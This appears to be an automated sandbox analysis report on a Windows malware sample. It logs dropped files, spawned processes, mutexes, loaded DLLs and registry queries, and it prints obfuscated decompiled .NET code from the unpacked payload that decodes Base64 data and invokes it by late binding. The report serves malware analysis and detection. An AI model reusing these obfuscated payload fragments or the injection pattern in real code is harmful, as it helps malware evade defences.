            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeFile created: C:\Users\user\AppData\Roaming\qNl6oqz9Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMutant created: NULL
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMutant created: \Sessions\1\BaseNamedObjects\IE7fbCaB2pyhKXUX
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeVirustotal: Detection: 25%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe "C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: atl.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: atl.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: atl.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

            Data Obfuscation

            barindex
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
